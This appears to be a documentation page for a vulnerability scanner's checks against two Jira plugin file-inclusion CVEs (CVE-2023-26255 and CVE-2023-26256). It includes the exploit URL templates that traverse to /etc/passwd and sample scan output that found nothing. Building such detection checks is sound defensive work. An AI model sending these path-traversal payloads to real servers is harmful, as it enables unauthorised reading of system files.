CVE-2023-26255 | CVE-2023-26256

Category: [LFI]

module name: check_cve_2023_26255

url: {url}plugins/servlet/snjCustomDesignConfig?fileName=../../../../etc/passwd&fileMime=$textMime

module name: check_cve_2023_26256

url: {url}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime

[CG] will update true positive once i find one

INFO: IN DEVELOPMENT Checking for CVE-2023-26255
[Testing URL]: https://JIRA/plugins/servlet/snjCustomDesignConfig?fileName=../../../../etc/passwd&fileMime=$textMime
- No CVE-2023-26255 vulnerability detected on: https://JIRA/plugins/servlet/snjCustomDesignConfig?fileName=../../../../etc/passwd&fileMime=$textMime
- HTTP Status Code: 404

INFO: IN DEVELOPMENT Checking for CVE-2023-26256
[Testing URL]: https://JIRA/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
- No CVE-2023-26256 vulnerability detected on: https://JIRA/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime
- HTTP Status Code: 404

References:

• https://isc.sans.edu/diary/30038
• https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26255.md